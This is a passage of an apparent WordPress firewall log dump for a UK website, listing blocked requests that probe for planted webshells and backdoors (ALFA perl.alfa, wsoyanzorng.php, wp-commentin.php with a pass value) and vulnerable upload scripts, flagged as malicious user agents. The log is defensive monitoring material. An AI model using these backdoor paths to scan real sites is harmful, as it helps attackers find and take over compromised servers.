User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11784,1674343984.411450,1674343984.282000,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11785,1674348463.283972,1674348461.726100,'\0\0\0\0\0\0\0\0\0\0��PL3',0,403,0,0,0,'https://dailyjolly.co.uk/wp-includes/wsoyanzorng.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCBpNjg2OyBydjoyOC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzI4LjA=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11786,1674350827.132297,1674350825.758200,'\0\0\0\0\0\0\0\0\0\0��:�M�',0,403,0,0,0,'https://dailyjolly.co.uk/102/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwMi9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11787,1674355850.515808,1674355850.020900,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11788,1674355846.802178,1674355846.058100,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11789,1674365339.347144,1674365339.211000,'\0\0\0\0\0\0\0\0\0\0��RB(',0,403,0,0,0,'https://dailyjolly.co.uk/103/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwMy9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11790,1674376797.368839,1674376796.844700,'\0\0\0\0\0\0\0\0\0\0��m���',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mainwp-file-uploader-extension/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlud3AtZmlsZS11cGxvYWRlci1leHRlbnNpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlud3AtZmlsZS11cGxvYWRlci1leHRlbnNpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11791,1674376797.368723,1674376796.844700,'\0\0\0\0\0\0\0\0\0\0��m���',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/mainwp-file-uploader-extension/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlud3AtZmlsZS11cGxvYWRlci1leHRlbnNpb24vcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlud3AtZmlsZS11cGxvYWRlci1leHRlbnNpb24vcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11792,1674377418.288888,1674377418.167000,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11793,1674377418.274100,1674377418.151500,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11794,1674377418.103678,1674377417.992900,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11795,1674377417.970940,1674377417.838300,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11796,1674377417.944248,1674377417.829100,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11797,1674377417.781757,1674377417.664800,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11798,1674377417.571978,1674377417.438300,'\0\0\0\0\0\0\0\0\0\0���o��',0,403,0,0,0,'https://dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11799,1674379985.666348,1674379985.539900,'\0\0\0\0\0\0\0\0\0\0���\'�',0,403,0,0,0,'https://dailyjolly.co.uk/1998/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzE5OTgvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11800,1674384922.713997,1674384922.576700,'\0\0\0\0\0\0\0\0\0\0����y(',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11801,1674384914.668570,1674384914.541500,'\0\0\0\0\0\0\0\0\0\0����y(',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11802,1674384900.048009,1674384899.917100,'\0\0\0\0\0\0\0\0\0\0����y(',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11803,1674384884.778577,1674384884.659600,'\0\0\0\0\0\0\0\0\0\0����y(',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11804,1674384883.131897,1674384883.001400,'\0\0\0\0\0\0\0\0\0\0����y(',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11805,1674394749.324509,1674394749.195500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://dailyjolly.co.uk/1999/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzE5OTkvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11806,1674397924.411295,1674397924.299400,'\0\0\0\0\0\0\0\0\0\0�����=',0,403,0,0,0,'https://dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11807,1674397923.982518,1674397923.853400,'\0\0\0\0\0\0\0\0\0\0�����=',0,403,0,0,0,'https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11808,1674399406.312147,1674399406.174100,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fam5ld3NsZXR0ZXIvaW5jbHVkZXMvb3BlbmZsYXNoY2hhcnQvcGhwLW9mYy1saWJyYXJ5L29mY191cGxvYWRfaW1hZ2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11809,1674409759.619635,1674409758.222400,'\0\0\0\0\0\0\0\0\0\0��_X��',0,403,0,0,0,'https://dailyjolly.co.uk/1x1/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzF4MS9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11810,1674414806.136591,1674414805.160100,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11811,1674417643.727102,1674417643.520800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plain.php','http://www.dailyjolly.co.uk/wp-plain.php, www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLXBsYWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11812,1674417643.675349,1674417643.512300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','http://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 